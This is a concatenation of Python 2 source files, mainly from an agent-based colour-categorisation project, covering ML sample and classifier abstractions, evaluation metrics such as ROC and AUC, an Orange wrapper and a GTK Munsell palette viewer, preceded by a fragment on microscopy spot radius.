check_parameter(voxel_size_z=(int, float, type(None)),
voxel_size_yx=(int, float),
psf_z=(int, float, type(None)),
psf_yx=(int, float))
# compute sigma
sigma_yx = psf_yx / voxel_size_yx
if voxel_size_z is None or psf_z is None:
return sigma_yx, sigma_yx
else:
sigma_z = psf_z / voxel_size_z
return sigma_z, sigma_yx, sigma_yx
def get_radius(voxel_size_z=None, voxel_size_yx=100, psf_z=None, psf_yx=200):
"""Approximate the radius of the detected spot.
We use the formula:
.. math::
\\mbox{radius} = \\mbox{sqrt(ndim)} * \\sigma
with :math:`\\mbox{ndim}` the number of dimension of the image and
:math:`\\sigma` the standard deviation (in pixel) of the detected spot.
Parameters
----------
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, we consider
a 2-d spot.
    voxel_size_yx : int or float
        Size of a voxel on the yx plane, in nanometer.
    psf_z : int or float or None
        Theoretical size of the PSF emitted by a spot in the z plane, in
        nanometer. If None, we consider a 2-d spot.
    psf_yx : int or float
        Theoretical size of the PSF emitted by a spot in the yx plane, in
        nanometer.
Returns
-------
radius : Tuple[float]
Radius in pixels of the detected spots, one element per dimension.
"""
# compute sigma
sigma = get_sigma(voxel_size_z, voxel_size_yx, psf_z, psf_yx)
# compute radius
radius = [np.sqrt(len(sigma)) * sigma_ for sigma_ in sigma]
radius = tuple(radius)
return radius
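# Illustrative example (hypothetical acquisition parameters): with
# voxel_size_z=300, voxel_size_yx=103, psf_z=350 and psf_yx=150,
# get_sigma(300, 103, 350, 150) returns (350/300, 150/103, 150/103) and
# get_radius scales each of these standard deviations by sqrt(3).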
``` |
{
"source": "4dnucleome/cog-abm",
"score": 3
} |
#### File: cog_abm/agent/sensor.py
```python
from ..extras.tools import abstract
from ..ML.diversity import new_sample_specified_attributes
class Sensor(object):
""" Basic sensor.
"""
def sense(self, item):
abstract()
class SimpleSensor(Sensor):
""" Just gives back what he got """
def __init__(self, mask=None):
self.mask = mask
def sense(self, item):
if self.mask is None:
return item
else:
return new_sample_specified_attributes(item, self.mask)
```
#### File: cog_abm/extras/color.py
```python
from cog_abm.ML.core import Sample, euclidean_distance
class Color(Sample):
"""
Color represented in CIE L*a*b* space
"""
def __init__(self, L, a, b):
"""
Initialize Color
http://en.wikipedia.org/wiki/Lab_color_space
section: Range_of_L.2Aa.2Ab.2A_coordinates
@param L: lightness - should be in [0,100]
@param a: can be negative
@param b: can be negative
"""
super(Color, self).__init__([L, a, b], dist_fun=euclidean_distance)
self.L = L
self.a = a
self.b = b
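# Illustrative example (hypothetical values): two colours in CIE L*a*b* space
# and their Euclidean distance, computed through Sample.distance.
#
#   c1 = Color(50, 10, -10)
#   c2 = Color(50, 10, -13)
#   c1.distance(c2)  # -> 3.0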
def get_WCS_colors():
from cog_abm.extras.parser import Parser
import os
return Parser().parse_environment(
os.path.join(os.path.dirname(__file__), "330WCS.xml")).stimuli
def get_1269Munsell_chips():
from cog_abm.extras.parser import Parser
import os
return Parser().parse_environment(os.path.join(os.path.dirname(__file__),
"1269_munsell_chips.xml")).stimuli
```
#### File: cog_abm/ML/core.py
```python
import math
from itertools import izip
from random import shuffle
from scipy.io.arff import loadarff
from cog_abm.extras.tools import flatten
class Classifier(object):
def classify(self, sample):
pass
def classify_pval(self, sample):
"""
Returns tuple with class and probability of sample belonging to it
"""
pass
def class_probabilities(self, sample):
"""
Returns dict with mapping class->probability that sample belongs to it
"""
pass
def train(self, samples):
pass
def clone(self):
"""
Returns copy of classifier. This is default implementation.
Should be overriden in subclasses.
@rtype: Classifier
@return: New instance of classifier.
"""
import copy
return copy.deepcopy(self)
class Attribute(object):
ID = None
""" This class field is for id when putting some conversion method in dict
"""
def get_value(self, value):
''' value is inner representation
'''
pass
def set_value(self, value):
''' value is outer representation
'''
return value
def __eq__(self, other):
return self.ID == other.ID
class NumericAttribute(Attribute):
ID = "NumericAttribute"
def get_value(self, value):
return value
class NominalAttribute(Attribute):
ID = "NominalAttribute"
def __init__(self, symbols):
"""
Symbols should be strings!
For example Orange doesn't support any other format
"""
symbols = [str(s) for s in symbols]
self.symbols = tuple(s for s in symbols)
self.mapping = dict(reversed(x) for x in enumerate(self.symbols))
self.tmp_rng = set(xrange(len(self.symbols)))
def get_symbol(self, idx):
return self.symbols[idx]
def get_idx(self, symbol):
return self.mapping[str(symbol)]
def get_value(self, value):
return self.get_symbol(value)
def set_value(self, value):
return self.set_symbol(value)
def set_symbol(self, symbol):
return self.get_idx(symbol)
def __eq__(self, other):
return super(NominalAttribute, self).__eq__(other) and \
set(self.symbols) == set(other.symbols)
class Sample(object):
def __init__(self, values, meta=None, cls=None, cls_meta=None,
dist_fun=None, last_is_class=False, cls_idx=None):
self.values = values[:]
self.meta = meta or [NumericAttribute() for _ in values]
if last_is_class or cls_idx is not None:
if last_is_class:
cls_idx = -1
self.cls_meta = self.meta[cls_idx]
self.cls = self.values[cls_idx]
self.meta = self.meta[:]
del self.values[cls_idx], self.meta[cls_idx]
else:
self.cls = cls
self.cls_meta = cls_meta
if dist_fun is None and \
all(attr.ID == NumericAttribute.ID for attr in self.meta):
self.dist_fun = euclidean_distance
else:
self.dist_fun = dist_fun
def get_cls(self):
if self.cls_meta is None or self.cls is None:
return None
return self.cls_meta.get_value(self.cls)
def get_values(self):
return [m.get_value(v) for v, m in izip(self.values, self.meta)]
def distance(self, other):
return self.dist_fun(self, other)
def __eq__(self, other):
return self.cls == other.cls and self.cls_meta == other.cls_meta and \
self.meta == other.meta and self.values == other.values
def __hash__(self):
return 3 * hash(tuple(self.values)) + 5 * hash(self.cls)
def __str__(self):
return "({0}, {1})".format(str(self.get_values()), self.get_cls())
def __repr__(self):
return str(self)
def copy_basic(self):
return Sample(self.values, self.meta, dist_fun=self.dist_fun)
def copy_full(self):
return Sample(self.values, self.meta, self.cls, self.cls_meta,
self.dist_fun)
def copy_set_cls(self, cls, meta):
s = self.copy_basic()
s.cls_meta = meta
s.cls = meta.set_value(cls)
return s
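# Illustrative example (hypothetical values): a labelled sample with two
# numeric attributes and a nominal class.
#
#   cls_meta = NominalAttribute(["red", "green"])
#   s = Sample([0.3, 0.7], cls=cls_meta.set_symbol("red"), cls_meta=cls_meta)
#   s.get_cls()     # -> "red"
#   s.get_values()  # -> [0.3, 0.7]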
#Sample distance functions
def euclidean_distance(sx, sy):
return math.sqrt(math.fsum([
(x - y) * (x - y) for x, y in izip(sx.get_values(), sy.get_values())
]))
def load_samples_arff(file_name, last_is_class=False, look_for_cls=True):
a_data, a_meta = loadarff(file_name)
names = a_meta.names()
attr = {"nominal": lambda attrs: NominalAttribute(attrs),
"numeric": lambda _: NumericAttribute()}
gen = (a_meta[n] for n in names)
meta = [attr[a[0]](a[1]) for a in gen]
cls_idx = None
if look_for_cls:
for i, name in enumerate(names):
if a_meta[name][0] == "nominal" and name.lower() == "class":
cls_idx = i
break
def create_sample(s):
values = [mi.set_value(vi) for mi, vi in izip(meta, s)]
return \
Sample(values, meta, last_is_class=last_is_class, cls_idx=cls_idx)
return [create_sample(s) for s in a_data]
def split_data(data, train_ratio=2. / 3.):
""" data - samples to split into two sets: train and test
train_ratio - real number in [0,1]
returns (train, test) - pair of data sets
"""
tmp = [s for s in data]
shuffle(tmp)
train = [s for i, s in enumerate(tmp) if i < train_ratio * len(tmp)]
test = [s for i, s in enumerate(tmp) if i >= train_ratio * len(tmp)]
return (train, test)
def split_data_cv(data, folds=8):
""" data - samples to split into two sets *folds* times
returns [(train, test), ...] - list of pairs of data sets
"""
tmp = [s for s in data]
shuffle(tmp)
N = len(tmp)
M = N / folds
overflow = N % folds
splits = []
i = 0
while i < N:
n = M
if overflow > 0:
overflow -= 1
n += 1
split = tmp[i:i + n]
splits.append(split)
i += n
return [(flatten(splits[:i] + splits[i + 1:]), splits[i])
for i in xrange(folds)]
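# Illustrative note (hypothetical data): with 10 samples and folds=3,
# split_data_cv returns 3 (train, test) pairs with test sizes 4, 3 and 3;
# every sample appears in exactly one test set.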
```
#### File: cog_abm/ML/diversity.py
```python
import random
from itertools import izip
from core import Classifier, Sample, split_data
# Methods supposed to introduce diversity:
# * using only subset of attributes
def new_sample_specified_attributes(sample, mask):
""" mask[i] == True if we want to keep this attribute
"""
f = lambda v: [x for x, b in izip(v, mask) if b]
values, meta = f(sample.values), f(sample.meta)
return Sample(values, meta, cls=sample.cls, cls_meta=sample.cls_meta,
dist_fun=sample.dist_fun)
def gen_bitmap(length, num_missing):
mask = [True for _ in xrange(length - num_missing)] + \
[False for _ in xrange(num_missing)]
random.shuffle(mask)
return mask
def random_attribute_selection(samples, num_deleted=2):
    mask = gen_bitmap(len(samples[0].meta), num_deleted)
return [new_sample_specified_attributes(s, mask) for s in samples]
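# Illustrative example (hypothetical mask): a mask of [True, False, True]
# applied to a 3-attribute sample keeps attributes 0 and 2 and drops
# attribute 1; gen_bitmap(3, 1) builds such a mask with the False position
# chosen at random.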
# * using only specified ratio of samples in learning
def random_subset_of_samples(samples, ratio):
return split_data(samples, ratio)[0]
# Wrappers around classifiers to make things easier
class ClassifierSubsetOfAttrs(Classifier):
def __init__(self, classifier, present_ratio=None, num_missing=None):
self.classifier = classifier
self.num_missing = num_missing
self.present_ratio = present_ratio
self.attrs_mask = None
def classify(self, sample):
sample = new_sample_specified_attributes(sample, self.attrs_mask)
return self.classifier.classify(sample)
def classify_pval(self, sample):
sample = new_sample_specified_attributes(sample, self.attrs_mask)
return self.classifier.classify_pval(sample)
def class_probabilities(self, sample):
sample = new_sample_specified_attributes(sample, self.attrs_mask)
return self.classifier.class_probabilities(sample)
def train(self, samples):
num_attrs = len(samples[0].values)
if self.present_ratio is not None:
self.num_missing = int((1. - self.present_ratio) * num_attrs)
self.attrs_mask = gen_bitmap(num_attrs, self.num_missing)
samples = [new_sample_specified_attributes(s, self.attrs_mask)
for s in samples]
self.classifier.train(samples)
class ClassifierSubsetOfTraining(Classifier):
def __init__(self, classifier, present_ratio=None, num_missing=None):
self.classifier = classifier
self.num_missing = num_missing
self.present_ratio = present_ratio
self.attrs_mask = None
def classify(self, sample):
return self.classifier.classify(sample)
def classify_pval(self, sample):
return self.classifier.classify_pval(sample)
def class_probabilities(self, sample):
return self.classifier.class_probabilities(sample)
def train(self, samples):
num = len(samples)
if self.present_ratio is not None:
num_to_learn = int(self.present_ratio * num)
else:
num_to_learn = max(0, num - self.num_missing)
samples = [x for x in samples]
random.shuffle(samples)
samples = samples[:num_to_learn]
self.classifier.train(samples)
```
#### File: cog_abm/ML/measurement.py
```python
import time
from statistics import correct
def timeit(fun, *args, **kwargs):
start = time.time()
ret = fun(*args, **kwargs)
elapsed = time.time() - start
return (ret, elapsed)
def analyse_classifier(classifier, d_train, d_test):
train_t = timeit(classifier.train, d_train)[1]
corr, test_t = timeit(correct, classifier, d_test)
return corr, train_t, test_t
```
#### File: cog_abm/ML/orange_wrapper.py
```python
import orange, orngSVM, orngEnsemble
import core
from itertools import izip
orange_learners_modules = [orange, orngSVM, orngEnsemble]
#useful methods
def create_numeric_variable(sid, meta):
return orange.FloatVariable(sid)
def create_nominal_variable(sid, meta):
return orange.EnumVariable(sid, values=[str(e) for e in meta.symbols])
orange_variable_map = {
core.NumericAttribute.ID: create_numeric_variable,
core.NominalAttribute.ID: create_nominal_variable
}
def create_basic_variables(meta):
return [orange_variable_map[m.ID]("atr"+str(i), m)
for i,m in enumerate(meta)]
def create_domain_with_cls(meta, cls_meta):
l = create_basic_variables(meta)
l.append(create_nominal_variable("classAttr",cls_meta))
return orange.Domain(l, True)
def _basic_convert_sample(domain, sample):
return [orange.Value(dv, v) for dv, v in
izip(domain, sample.get_values())]
def convert_sample(domain, sample):
tmp = _basic_convert_sample(domain, sample)
return orange.Example(domain, tmp+[None])
#this should work if cls is in domain
def convert_sample_with_cls(domain, sample):
tmp = _basic_convert_sample(domain, sample)
return orange.Example(domain, tmp + [domain.classVar(sample.get_cls())])
def get_orange_classifier_class(name, module=None):
if module is None:
for module in orange_learners_modules:
try:
classifier_class = getattr(module, name)
return classifier_class
except AttributeError:
pass
return None
else:
module = __import__(module)
# TODO i think that this won't work if module contains dot
return getattr(module, name)
class OrangeClassifier(core.Classifier):
def __init__(self, name, *args, **kargs):
self.classifier_class = get_orange_classifier_class(name,
module=kargs.get('module', None))
if self.classifier_class is None:
raise ValueError("No %s learner in orange libs", name)
self.classifier_args = args
self.classifier_kargs = kargs
self.domain_with_cls = None
self._create_new_classifier()
def _create_new_classifier(self):
self.classifier = self.classifier_class(*self.classifier_args, \
**self.classifier_kargs)
def _extract_value(self, cls):
return cls.value
def classify(self, sample):
if self.domain_with_cls is None:
return None
s = convert_sample(self.domain_with_cls, sample)
return self._extract_value(self.classifier(s))
# TODO: I think that parent method should be fine
# def clone(self):
# return None
def classify_pval(self, sample):
if self.domain_with_cls is None:
return None
s = convert_sample(self.domain_with_cls, sample)
v, p = self.classifier(s, orange.GetBoth)
return (self._extract_value(v), p[v])
def class_probabilities(self, sample):
if self.domain_with_cls is None:
return None
s = convert_sample(self.domain_with_cls, sample)
probs = self.classifier(s, orange.GetProbabilities)
d = dict(probs.items())
return d
def train(self, samples):
"""
Trains classifier with given samples.
We recreate domain, because new class could be added
"""
if not samples:
self.domain_with_cls = None
return
meta = samples[0].meta
cls_meta = samples[0].cls_meta
self.domain_with_cls = create_domain_with_cls(meta, cls_meta)
et = orange.ExampleTable(self.domain_with_cls)
et.extend([convert_sample_with_cls(self.domain_with_cls, s)
for s in samples])
self._create_new_classifier()
self.classifier = self.classifier(et)
# self.classifier = self.classifier_class(et, *self.classifier_args,\
# **self.classifier_kargs)
```
#### File: cog_abm/ML/statistics.py
```python
import math
from collections import namedtuple
from itertools import combinations, groupby
from cog_abm.extras.tools import avg, calc_std, calc_auc
def calc_basic_rates(classifier, samples, positive_class):
positive_class = str(positive_class)
sc = [(s, s.get_cls()) for s in samples]
positive = set(s for s, c in sc if c == positive_class)
negative = set(s for s, c in sc if c != positive_class)
tp = [classifier.classify(s) for s in positive].count(positive_class)
fp = [classifier.classify(s) for s in negative].count(positive_class)
tn = len(negative) - fp
fn = len(positive) - tp
return tuple(float(x) for x in (tp, tn, fp, fn))
def basic_rates_based(fn):
def calculator(classifier, samples, positive_class, basic_rates=None):
if basic_rates is None:
basic_rates = calc_basic_rates(classifier, samples, positive_class)
try:
return fn(classifier, samples, positive_class, basic_rates)
except ZeroDivisionError:
return 0.
return calculator
# from http://en.wikipedia.org/wiki/Receiver_operating_characteristic
# passing basic_rates for speed up
@basic_rates_based
def TPR(classifier, samples, positive_class, basic_rates=None):
tp, _, _, fn = basic_rates
return tp / (tp + fn)
def sensitivity(classifier, samples, positive_class, basic_rates=None):
return TPR(classifier, samples, positive_class, basic_rates)
def recall(classifier, samples, positive_class, basic_rates=None):
return TPR(classifier, samples, positive_class, basic_rates)
@basic_rates_based
def FPR(classifier, samples, positive_class, basic_rates=None):
_, tn, fp, _ = basic_rates
return fp / (fp + tn)
@basic_rates_based
def accuracy(classifier, samples, positive_class, basic_rates=None):
tp, tn, fp, fn = basic_rates
return (tp + tn) / (tp + tn + fp + fn)
def TNR(classifier, samples, positive_class, basic_rates=None):
return 1. - FPR(classifier, samples, positive_class, basic_rates)
def specificity(classifier, samples, positive_class, basic_rates=None):
return TNR(classifier, samples, positive_class, basic_rates)
@basic_rates_based
def PPV(classifier, samples, positive_class, basic_rates=None):
tp, _, fp, _ = basic_rates
return tp / (tp + fp)
def precision(classifier, samples, positive_class, basic_rates=None):
return PPV(classifier, samples, positive_class, basic_rates)
@basic_rates_based
def NPV(classifier, samples, positive_class, basic_rates=None):
_, tn, _, fn = basic_rates
return tn / (tn + fn)
@basic_rates_based
def FDR(classifier, samples, positive_class, basic_rates=None):
tp, _, fp, _ = basic_rates
return fp / (fp + tp)
@basic_rates_based
def MCC(classifier, samples, positive_class, basic_rates=None):
tp, tn, fp, fn = basic_rates
return (tp * tn - fp * fn) / \
math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
def correct(classifier, samples):
return math.fsum([int(classifier.classify(s) == s.get_cls())
for s in samples]) / len(samples)
ClassifiedSample = namedtuple("ClassifiedSample", "sample cls distribution")
def classify_samples(classifier, samples):
def tmp(sample):
d = classifier.class_probabilities(sample)
cls = classifier.classify(sample)
return ClassifiedSample(sample, cls, d)
return map(tmp, samples)
def group_by_classes(samples, key=lambda s: s.get_cls()):
''' This function groups samples into sets containing the same class
IMPORTANT:
**This will skip empty classes (it takes them from samples)**
'''
s = sorted(samples, key=key)
return dict(((cls, list(l)) for cls, l in groupby(s, key=key)))
def ROC(classifier, samples, positive_class):
return _ROC(classify_samples(classifier, samples), positive_class)
def _ROC(classified_test_samples, positive_class):
key = lambda classified_sample: \
classified_sample.distribution.get(positive_class, 0.)
L = sorted(classified_test_samples, key=key, reverse=True)
res = []
fp, tp = 0., 0.
    prev_prob = -1  # this guarantees that (0, 0) will be in the resulting list
for sample, classifier_class, distrib in L:
prob = distrib.get(positive_class, 0.)
if prob != prev_prob:
res.append((fp, tp))
prev_prob = prob
if sample.get_cls() == positive_class:
tp += 1
else:
fp += 1
res.append((fp, tp))
if tp == 0:
tp = 1
        # this is a dirty hack - there were no positive samples in the data
        # so either way we will get 0 there
if fp == 0:
fp = 1
return [(x / fp, y / tp) for x, y in res]
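# Illustrative note (not from the original module): the list returned by _ROC
# starts at (0, 0) and, when both classes are present, ends at (1, 1); it can
# be passed to calc_auc (imported from cog_abm.extras.tools above) to obtain
# the area under the ROC curve, as done in AUCROC_weighting below.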
def AUCROC_weighting(gbc):
N = math.fsum([len(samples) for _, samples in gbc.iteritems()])
N2 = N * N
waucs = [(len(samples1) * len(samples2) / N2, calc_auc(_ROC(samples1 + samples2, cls1)))
for (cls1, samples1), (cls2, samples2) in combinations(gbc.items(), 2)]
wsum = math.fsum((x[0] for x in waucs))
# TODO can wsum be 0? what if?
return math.fsum(map(lambda x: x[0] * x[1], waucs)) / wsum
def AUCROC_nonweighting(gbc):
return avg([calc_auc(_ROC(samples1 + samples2, cls1))
for (cls1, samples1), (cls2, samples2) in combinations(gbc.items(), 2)])
def AUCROC(classifier, test_samples, weighted=False):
''' Weighted version seems to be more common...
but is computationally more expensive
'''
classified_samples = classify_samples(classifier, test_samples)
if filter(lambda cs: cs.cls is None, classified_samples):
return 0.
gbc = group_by_classes(classified_samples, key=lambda cs: cs.sample.get_cls())
if weighted:
f = AUCROC_weighting
else:
f = AUCROC_nonweighting
return f(gbc)
def classifier_single_performance(classifier, train, test, measure):
    ''' Trains the classifier on the given training set and evaluates it on the test set
'''
classifier.train(train)
return measure(classifier, test)
def avg_classifier_performance(classifier, data_sets, measure):
''' Returns average and std dev of classifier performance over
train and test sets using given measure
'''
return calc_std([classifier_single_performance(classifier,
train, test, measure) for train, test in data_sets])
def aucroc_avg_classifier_performance(classifier, data_sets):
''' This is defined just because this might be used quite often
'''
return avg_classifier_performance(classifier, data_sets, AUCROC)
```
#### File: src/presenter/munsell_palette.py
```python
import sys
sys.path.append('../')
import os
import pygtk
pygtk.require("2.0")
import gtk
import pango
import copy
from presenter import grapefruit
from cog_abm.extras.color import *
from cog_abm.core.result import *
from steels.steels_experiment import *
#from steels.analyzer import *
import math
import cPickle
from itertools import izip, imap
from time import time
argmax = lambda funct, items: max(izip(imap(funct, items), items))
argmin = lambda funct, items: min(izip(imap(funct, items), items))
def str2bool(v):
return v.lower() in ["yes", "true", "t", "y", "1"]
CELLAR_SPACE = 1
CELLAR_SIZE = 15
PANGO_FONT = "normal 7"
AGENTS_CONTAINERS_IN_ROW = 2
MAIN_CONTAINER_REQUESTED_HEIGHT = 600
MAIN_CONTAINER_REQUESTED_WIDTH = 1200
class AgentData(object):
def __init__(self, cielab, find_focal):
self.cielab = cielab
self.painted = []
self.focals = []
self.ff = find_focal
def handle_categories(self, iter, agent):
#start_time = time()
self.painted.append(range(330))
self.focals.append({})
if (iter == 0):
return
dictionary = {}
category_set = [agent.state.classify(stimuli)
for stimuli in self.cielab]
#print category_set
for i in xrange(len(category_set)):
if category_set[i] not in dictionary:
dictionary[category_set[i]] = []
dictionary[category_set[i]].append(i)
#focal_time = time()
focals = self.focals[iter]
#print dictionary
for key, set in dictionary.iteritems():
if (self.ff == "normal"):
#print "normal"
focal = self.find_focal_point(set)
#elif (key <> None):
else:
focal = self.strength_find_focal_point(agent, key,
category_set, set)
focals[focal] = None
self.set_focal(iter, set, focal)
#print "Focal handling lasts %f - %f percent of handling category time." % (float(time() - focal_time), float((time() - focal_time)/(time() - start_time)))
def set_focal(self, iter, category_set, focal):
painted = self.painted[iter]
for i in xrange(len(category_set)):
painted[category_set[i]] = focal
def find_focal_point(self, index_set):
focal = index_set[0]
f_sum = float('inf')
for i in index_set:
c = self.cielab[i]
sum = math.fsum(
[c.distance(self.cielab[j]) for j in index_set])
if sum < f_sum:
f_sum = sum
focal = i
return focal
def strength_find_focal_point(self, agent, key, category_set, values):
max = - float('inf')
focal = category_set[0]
#print key, category_set, values
for val in values:
strength = agent.state.sample_strength(key,
self.cielab[val])
if strength > max:
max = strength
focal = val
return focal
def get_number_of_categories(self, iter):
return len(self.focals[iter])
class AgentDataWithLanguage(AgentData):
def __init__(self, cielab, find_focal = "normal"):
super(AgentDataWithLanguage, self).__init__(cielab, find_focal)
self.names = []
self.focal_names = []
def handle_categories(self, iter, agent):
#start_time = time()
self.painted.append(range(330))
self.focals.append({})
self.focal_names.append({})
self.names.append(range(330))
if (iter == 0):
return
dictionary = {}
category_set = [agent.state.classify(stimuli)
for stimuli in self.cielab]
#print category_set
for i in xrange(len(category_set)):
if category_set[i] not in dictionary:
dictionary[category_set[i]] = []
dictionary[category_set[i]].append(i)
#focal_time = time()
focals = self.focals[iter]
focal_names = self.focal_names[iter]
for key, set in dictionary.iteritems():
if (self.ff == "normal"):
#print "normal"
focal = self.find_focal_point(set)
#elif key <> None:
else:
focal = self.strength_find_focal_point(agent, key,
category_set, set)
name = str(agent.state.word_for(key))
#two dictionaries for better performance
focals[focal] = name
focal_names[name] = focal
self.set_focal(iter, set, focal, name)
def set_focal(self, iter, category, focal, name):
#self.names.append(range(330))
names = self.names[iter]
painted = self.painted[iter]
for i in xrange(len(category)):
painted[category[i]] = focal
names[category[i]] = name
class Population(AgentDataWithLanguage):
def handle_categories(self, iter, agents_data):
#self.focals[iter] -> {focal} = name
#self.names[iter] -> {color} = name
#self.focal_names[iter] -> {name} = focal
#print "Iter: ", iter
names_iter = range(330)
self.names.append(names_iter)
focals_names_iter = {}
self.focal_names.append(focals_names_iter)
focals_iter = {}
self.focals.append(focals_iter)
self.painted.append(range(330))
painted = self.painted[iter]
if (iter == 0):
return
#all agents focals in category: key: category_name, value: list_of_focals
category_set = {}
#setting name for each color_square
for color_nr in xrange(len(names_iter)):
name_counter = {} #counts names for color for each name
for agent in agents_data:
iter_names = agent.names[iter]
name = iter_names[color_nr]
                if name != str(None):
if name in name_counter:
name_counter[name] += 1
else:
name_counter[name] = 1
best_name = 'None'
temp_sum = -1
for name, sum in name_counter.iteritems():
if sum > temp_sum:
best_name = name
temp_sum = sum
names_iter[color_nr] = best_name
if best_name not in category_set:
category_set[best_name] = []
category_set[best_name].append(color_nr)
#print category_set
#print names_iter
focal_counter = {}
#setting focals data in each category
for name in category_set:
counter = {}
for agent in agents_data:
iter_focal_names = agent.focal_names[iter]
if name in iter_focal_names:
focal = iter_focal_names[name]
                    # if the focal of this agent appears in the right population category
                    if names_iter[focal] == name:
                        if focal in counter:
counter[focal] += 1
else:
counter[focal] = 1
#print names_iter[focal], name
#focals
#category_set[name].append(focal)
focal_counter[name] = counter
#print focal_counter
#print names_dic_iter
#setting nearest focal (to other focals) in each category
for name, counter in focal_counter.iteritems():
#focals =category_set?[name]
#counter = focal_counter[name]
min = float('inf')
if len(counter.keys()) == 0:
for color in category_set[name]:
c = self.cielab[color]
sum = math.fsum([c.distance(self.cielab[col])
for col in category_set[name]])
if sum < min:
min = sum
foc = color
else:
for focal in counter:
c = self.cielab[focal]
                    # use a separate comprehension variable so the best focal
                    # found so far ('foc') is not overwritten
                    sum = math.fsum([c.distance(self.cielab[other]) * counter[other]
                                     for other in counter])
if sum < min:
min = sum
foc = focal
focals_names_iter[name] = foc
focals_iter[foc] = name
#print "Names_iter:", names_iter, "/n"
#print "focals_iter:", focals_iter, "/n"
#setting colors
for i in xrange(len(painted)):
painted[i] = focals_names_iter[names_iter[i]]
class WCSPalette(object):
def __init__(self, colors):
self.colors = copy.copy(colors)
self.CELLAR_SPACE = CELLAR_SPACE
self.CELLAR_SIZE = CELLAR_SIZE
self.area = gtk.DrawingArea()
self.area.set_size_request(42 * (self.CELLAR_SIZE + self.CELLAR_SPACE),
10 * (self.CELLAR_SIZE + self.CELLAR_SPACE))
self.area.connect("expose-event", self.area_expose)
self.pangolayout = self.area.create_pango_layout("")
self.pangolayout.set_font_description(pango.
FontDescription(PANGO_FONT))
def area_expose(self, area, event):
#self.style = self.area.get_style()
#self.gc = self.style.fg_gc[gtk.STATE_NORMAL]
#self.gc = self.area.window.new_gc()
self.paint_cellars()
def show(self):
self.area.show()
def paint_cellars(self, iter=0, paintable=range(330)):
self.current_iteration = iter
self.gc = self.area.window.new_gc(line_width=2)
self.area.window.clear()
for i in xrange(320):
col = (2+i%40)*(self.CELLAR_SIZE + self.CELLAR_SPACE)
row = (1+i/40)*(self.CELLAR_SIZE + self.CELLAR_SPACE)
self.gc.set_rgb_fg_color(self.colors[paintable[i]])
self.area.window.draw_rectangle(self.gc, True, col, row,
self.CELLAR_SIZE, self.CELLAR_SIZE)
for i in xrange(10):
self.gc.set_rgb_fg_color(self.colors[paintable[320+i]])
self.area.window.draw_rectangle(self.gc, True, 1, i*
(self.CELLAR_SIZE + self.CELLAR_SPACE)+1, self.CELLAR_SIZE,
self.CELLAR_SIZE)
self.paint_category_borders(paintable)
self.create_palette_labels()
def paint_category_borders(self, paintable):
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
space = self.CELLAR_SIZE + self.CELLAR_SPACE
self.area.window.draw_rectangle(self.gc, False, 1, 1,
self.CELLAR_SIZE, 10*(self.CELLAR_SIZE) + 9*self.CELLAR_SPACE)
self.area.window.draw_rectangle(self.gc, False, 2*space, space,
40*self.CELLAR_SIZE +39*self.CELLAR_SPACE, 8*self.CELLAR_SIZE
+ 7*self.CELLAR_SPACE)
#paint column lines
for i in xrange(8):
index =i*40
for j in xrange(39):
                if (paintable[index] != paintable[index+1]):
self.area.window.draw_line(self.gc, (3+j)*space-1,
(1+i)*space-1, (3+j)*space-1, (2+i)*space-1)
index += 1
#paint row lines
for i in xrange(7):
index = i*40
for j in xrange(40):
                if (paintable[index] != paintable[index+40]):
self.area.window.draw_line(self.gc, (2+j)*space-1,
(2+i)*space-1, (3+j)*space-1, (2+i)*space-1)
index += 1
#paint row lines in side box
index = 319
for i in xrange(9):
index += 1
            if (paintable[index] != paintable[index+1]):
self.area.window.draw_line(self.gc, 0, (1+i)*space,
space-1, (1+i)*space)
def create_palette_labels(self):
space = self.CELLAR_SIZE + self.CELLAR_SPACE
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
for i in xrange(1, 41):
col = (1 + i) * space
row = 0
self.pangolayout.set_text(str(i))
self.area.window.draw_layout(self.gc, col+2, row+3,
self.pangolayout)
for i in xrange(10):
self.pangolayout.set_text(chr(65 + i))
self.area.window.draw_layout(self.gc, space+2, i*space+2,
self.pangolayout)
class WCSAgent(WCSPalette):
def __init__(self, colors):
super(WCSAgent, self).__init__(colors)
self.current_iteration = 0
self.agent_data = None
def get_number_of_categories(self, iter):
if self.agent_data is None:
return 0
return self.agent_data.get_number_of_categories(iter)
def set_agent_data(self, agent_data):
self.agent_data = agent_data
def area_expose(self, area, event):
#self.gc = self.area.window.new_gc()
self.paint_cellars(self.current_iteration)
def paint_cellars(self, iter=0):
super(WCSAgent, self).paint_cellars(iter, self.agent_data.painted[iter])
self.paint_focals(self.agent_data.focals[iter])
def paint_focals(self, focals):
#print "paint focals", focals
circle_size = self.CELLAR_SIZE-1
wheel_size = self.CELLAR_SIZE-1
for i, name in focals.iteritems():
if i < 320:
col = (2+i%40)*(self.CELLAR_SIZE + self.CELLAR_SPACE)
row = (1+i/40)*(self.CELLAR_SIZE + self.CELLAR_SPACE)
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
self.area.window.draw_arc(self.gc, False, col, row,
circle_size, circle_size, 0, 23040)#360*64)
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("white"))
self.area.window.draw_arc(self.gc, True, col, row,
wheel_size, wheel_size, 0, 23040)#360*64)
else:
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("black"))
self.area.window.draw_arc(self.gc, False, 1, (i-320)*(self.
CELLAR_SIZE + self.CELLAR_SPACE)+1, circle_size,
circle_size, 0, 23040)
self.gc.set_rgb_fg_color(gtk.gdk.color_parse("white"))
self.area.window.draw_arc(self.gc, True, 1, (i-320)*(self.
CELLAR_SIZE + self.CELLAR_SPACE)+1, wheel_size,
wheel_size, 0, 23040)
class WCSAgentWithLegend(WCSAgent):
def __init__(self, colors):
super(WCSAgentWithLegend, self).__init__(colors)
self.legend = gtk.DrawingArea()
self.legend.connect("expose-event", self.legend_expose)
def area_expose(self, area, event):
#self.gc = self.area.window.new_gc()
self.paint_cellars(self.current_iteration)
def paint_cellars(self, iter=0):
super(WCSAgentWithLegend, self).paint_cellars(iter)
self.paint_legend(iter, self.agent_data.focals[iter])
def legend_expose(self, area, event):
self.gc = self.legend.window.new_gc()
self.paint_legend(self.current_iteration,
self.agent_data.focals[self.current_iteration])
def paint_legend(self, iter, focals = {}):
self.current_iteration = iter
self.gc = self.legend.window.new_gc()
self.legend.window.clear()
column = 0
row = self.CELLAR_SPACE
